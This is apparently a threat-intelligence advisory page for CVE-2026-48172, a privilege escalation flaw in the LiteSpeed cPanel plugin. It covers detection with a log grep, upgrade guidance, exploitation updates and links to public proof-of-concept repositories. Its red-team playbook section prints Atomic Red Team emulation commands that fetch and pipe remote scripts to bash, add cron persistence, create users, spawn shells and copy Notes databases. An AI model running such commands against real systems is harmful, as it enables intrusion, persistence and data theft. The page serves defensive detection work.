CVE-2026-48172
Overview
This vulnerability is a privilege escalation flaw rooted in improper handling of Redis enable/disable features within the LiteSpeed User-End cPanel Plugin. The affected component mismanages internal API calls related to the "cpanel_jsonapi_func=redisAble" parameter, allowing unauthorized elevation of privileges. The flaw resides in the plugin's logic that controls Redis functionality toggling, leading to escalation beyond intended permission boundaries.
Vulnerability Description
LiteSpeed User-End cPanel Plugin before 2.4.5 allows privilege escalation (possibly to root), as exploited in the wild in May 2026. Detection is best done via a command line of grep -rE "cpanel_jsonapi_func=redisAble" /var/cpanel/logs /usr/local/cpanel/logs/ 2>/dev/null in Bash. If you get no output, you have not been hit with exploitation of the vulnerability. If there is output, we recommend you examine the IP addresses in the list, determine if they are valid IP addresses, and if not, block them. To determine damage done, examine the system logs for use by the detected IP addresses. The issue is related to mishandling of Redis enable/disable features. The recommended minimum version is 2.4.7.
Impact
An attacker can gain elevated privileges, potentially root-level access, without any authentication or user interaction. This allows full control over the affected system, including unauthorized modification or exfiltration of sensitive data and the ability to execute arbitrary commands. The vulnerability enables attackers to bypass security controls and compromise the entire server environment, leading to severe operational and data integrity consequences.
Solution
Upgrade the LiteSpeed User-End cPanel Plugin to version 2.4.7 or later as recommended by LiteSpeed Technologies. Detailed patch instructions and release notes are available at https://www.litespeedtech.com/products/litespeed-web-server/control-panel-support/release-log. No alternative workarounds are specified; applying the vendor-provided update is the definitive remediation step.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the LiteSpeed User-End cPanel Plugin prior to version 2.4.5 is a critical security flaw that allows for privilege escalation, potentially granting attackers root access to affected systems. This issue arises from improper handling of the Redis enable/disable features within the plugin. Specifically, the vulnerability stems from insufficient validation of user inputs and permissions when interacting with Redis functionalities. Attackers can exploit this weakness to execute arbitrary commands with elevated privileges, thereby compromising the integrity and confidentiality of the system.
Exploitation of this vulnerability can occur through various attack vectors. An attacker with access to the cPanel interface could leverage the flawed functionality to enable Redis without proper authorization. Once Redis is enabled, the attacker can manipulate its configurations or execute malicious commands. This scenario highlights the importance of user authentication and authorization checks in web applications, as attackers may exploit weak or default credentials to gain initial access. Furthermore, the fact that this vulnerability has been actively exploited in the wild underscores the urgency for organizations to address it promptly.
The real-world impact of this vulnerability is significant, particularly for businesses that rely on the affected plugin for managing their web hosting environments. A successful exploitation could lead to unauthorized access to sensitive data, including customer information, financial records, and proprietary business data. The potential for data breaches not only poses a risk to the organization’s reputation but also exposes it to legal liabilities and regulatory penalties. Additionally, the financial implications of remediation efforts, loss of customer trust, and potential downtime could severely affect the organization's bottom line.
To detect this vulnerability, system administrators are advised to utilize command-line tools to search for specific logs that indicate exploitation attempts. The recommended command involves searching for instances of "cpanel_jsonapi_func=redisAble" within the cPanel logs. If any output is generated, it is crucial to investigate the associated IP addresses to determine their legitimacy. Blocking any suspicious IPs and analyzing system logs for unusual activity can help assess the extent of the compromise. Furthermore, organizations should ensure that they are running the latest version of the plugin, as updates beyond version 2.4.5 include patches that mitigate this vulnerability.
Mitigation strategies should focus on both immediate and long-term actions. In the short term, organizations should apply the latest updates to the LiteSpeed User-End cPanel Plugin to eliminate the vulnerability. Additionally, implementing strict access controls and monitoring user activities within the cPanel interface can help prevent unauthorized access. Long-term strategies should include regular security assessments and vulnerability scanning to identify and remediate potential weaknesses in the system proactively. Training staff on security best practices and fostering a culture of security awareness can further reduce the risk of exploitation.
In summary, the privilege escalation vulnerability in the LiteSpeed User-End cPanel Plugin poses a severe threat to organizations utilizing this software. The potential for unauthorized access to critical systems and data necessitates immediate action to detect, mitigate, and prevent exploitation. By adopting a proactive approach to security, organizations can safeguard their assets and maintain the trust of their customers in an increasingly hostile cyber landscape.
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting the LiteSpeed User-End cPanel Plugin vulnerability. Our telemetry indicates that previously dormant activity has now manifested in multiple new instances, signaling an increased interest or capability among threat actors to leverage this privilege escalation flaw. Although no new exploit variants or ransomware group affiliations have been identified, the uptick in detections suggests that adversaries are actively probing or exploiting vulnerable environments. This development elevates the urgency for defenders to enhance monitoring and incident response efforts, as the risk of unauthorized root-level access has become more tangible. The modest rise in the EPSS score, while still low, corroborates this trend and underscores a growing likelihood of exploitation in the near term. Consequently, the threat level associated with CVE-2026-48172 should be considered heightened, reflecting a shift from theoretical risk to active exploitation in the wild.
Update 2 — June 07, 2026
CSURFACE threat intelligence has detected a marked escalation in exploitation activity targeting CVE-2026-48172, with a significant surge in the deployment of new proof-of-concept exploits publicly available on GitHub. This expansion of the exploit landscape coincides with the inclusion of this vulnerability in the CISA Known Exploited Vulnerabilities (KEV) catalog, signaling recognition at the federal level of its active exploitation. Our telemetry indicates a rapid increase in attempts to leverage this privilege escalation flaw, reflected in a sharp rise in the Exploit Prediction Scoring System (EPSS) score, which now places the vulnerability in the upper percentile for imminent exploitation risk. These developments underscore a transition from opportunistic scanning to more targeted and sophisticated attacks, increasing the likelihood of successful unauthorized root access on affected systems. Consequently, the threat level associated with CVE-2026-48172 has escalated from a theoretical concern to a critical, actively exploited risk, demanding heightened vigilance from defenders monitoring cPanel environments integrated with LiteSpeed plugins.
Affected Products (2)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Litespeedtech | Litespeed Cpanel Plugin | All |
cpe:2.3:a:litespeedtech:litespeed_cpanel_plugin:*:*:*:*:*:*:*:*
|
|
|
Litespeedtech | Litespeed Whm Plugin | All |
cpe:2.3:a:litespeedtech:litespeed_whm_plugin:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (3)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
HORKimhab/CVE-2026-48172
CVE-2026-48172
|
HORKimhab | 1 | 0 | 2026-05-23 | View |
|
fevar54/CVE-2026-48172---LiteSpeed-cPanel-Plugin-Version-Auditor
This script safely checks the local version of the LiteSpeed cPanel plugin to determine if the system is running a versi...
|
fevar54 | 0 | 0 | 2026-05-28 | View |
|
retmakarunia/CVE-2026-48172
cPanel user run arbitrary scripts as root
|
retmakarunia | 0 | 0 | 2026-05-23 | View |
Threat Feed
20 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Proof-of-concept code is publicly available for this vulnerability
Sighting activity recorded
Sighting activity recorded
Active exploitation confirmed — vendor: LiteSpeed, product: cPanel Plugin
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns
No CAPEC pattern mapped to this CVE.
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
osascript -e 'tell application "Finder"' -e 'set destinationFolderPath to POSIX file "#{destination_path}"' -e 'set notesFolderPath to (path to home folder as text) & "Library:Group Containers:group.com.apple.notes:"' -e 'set notesFolder to folder notesFolderPath' -e 'set notesFiles to {file "NoteStore.sqlite", file "NoteStore.sqlite-shm", file "NoteStore.sqlite-wal"} of notesFolder' -e 'repeat with aFile in notesFiles' -e 'duplicate aFile to folder destinationFolderPath with replacing' -e 'end' -e 'end tell'
cd $HOME
curl -O #{remote_url}/art
curl -O #{remote_url}/gta.db
curl -O #{remote_url}/sqlite_dump.sh
chmod +x sqlite_dump.sh
find . ! -executable -exec bash -c 'if [[ "$(head -c 15 {} | strings)" == "SQLite format 3" ]]; then echo "{}"; ./sqlite_dump.sh {}; fi' \;
$startingDirectory = "#{starting_directory}"
$outputZip = "#{output_zip_folder_path}"
$fileExtensionsString = "#{file_extensions}"
$fileExtensions = $fileExtensionsString -split ", "
New-Item -Type Directory $outputZip -ErrorAction Ignore -Force | Out-Null
Function Search-Files {
param (
[string]$directory
)
$files = Get-ChildItem -Path $directory -File -Recurse | Where-Object {
$fileExtensions -contains $_.Extension.ToLower()
}
return $files
}
$foundFiles = Search-Files -directory $startingDirectory
if ($foundFiles.Count -gt 0) {
$foundFilePaths = $foundFiles.FullName
Compress-Archive -Path $foundFilePaths -DestinationPath "$outputZip\data.zip"
Write-Host "Zip file created: $outputZip\data.zip"
} else {
Write-Host "No files found with the specified extensions."
}
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
echo "#{command}" > /etc/cron.d/#{cron_script_name}
echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name}
echo "#{command}" > /etc/cron.daily/#{cron_script_name}
echo "#{command}" > /etc/cron.hourly/#{cron_script_name}
echo "#{command}" > /etc/cron.monthly/#{cron_script_name}
echo "#{command}" > /etc/cron.weekly/#{cron_script_name}
crontab -l > /tmp/notevil
echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron}
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (5)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2026-48172 |
| litespeedtech.com |
GitHub CVE
|
https://www.litespeedtech.com/products/litespeed-web-server/control-panel-support/cpanel |
| litespeedtech.com |
GitHub CVE
|
https://www.litespeedtech.com/products/litespeed-web-server/control-panel-support/release-log |
| blog.litespeedtech.com |
GitHub CVE
|
https://blog.litespeedtech.com/2026/05/21/security-update-for-litespeed-cpanel-plugin/ |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-48172 |